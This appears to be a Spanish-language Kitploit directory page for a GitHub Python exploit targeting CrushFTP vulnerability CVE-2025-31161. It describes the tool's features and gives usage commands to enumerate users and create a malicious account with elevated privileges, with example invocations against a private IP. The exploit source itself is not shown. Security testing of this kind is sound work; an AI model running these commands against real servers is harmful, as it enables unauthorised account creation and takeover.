Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-31161 — Script de explotación en Python para CVE-2025-31161 dirigido a CrushFTP. Enumera usuarios y crea cuentas maliciosas con permisos elevados mediante peticiones HTTP. | Kitploit
Herramientas/GitHubGitHub/ch3m1cl/cve-2025-31161
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubch3m1cl/cve-2025-31161

CVE-2025-31161

Script de explotación en Python para CVE-2025-31161 dirigido a CrushFTP. Enumera usuarios y crea cuentas maliciosas con permisos elevados mediante peticiones HTTP.

Ver Repositorio
112hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-31161 - Script de Explotación de CrushFTP

Python License


Descripción

Este repositorio contiene un script en Python para interactuar con el servicio CrushFTP vulnerable a CVE-2025-31161. El script permite listar usuarios existentes y agregar un usuario malicioso explotando la vulnerabilidad.


Características

  • Verificar si el host está activo antes de ejecutar comandos.
  • Listar usuarios válidos en el servidor CrushFTP.
  • Crear un usuario malicioso con permisos elevados.
  • Manejo básico de respuestas HTTP y errores.

Requisitos

  • Python 3.10 o superior
  • módulo requests

Instalar dependencias:

root@kitploit:~
pip install -r requirements.txt

Listar usuarios

root@kitploit:~
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>

Agregar Usuario Malicioso

root@kitploit:~
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>

Ejemplos:

Listar usuarios en un objetivo:

root@kitploit:~
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80

Agregar un usuario malicioso:

root@kitploit:~
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234
Descargar herramienta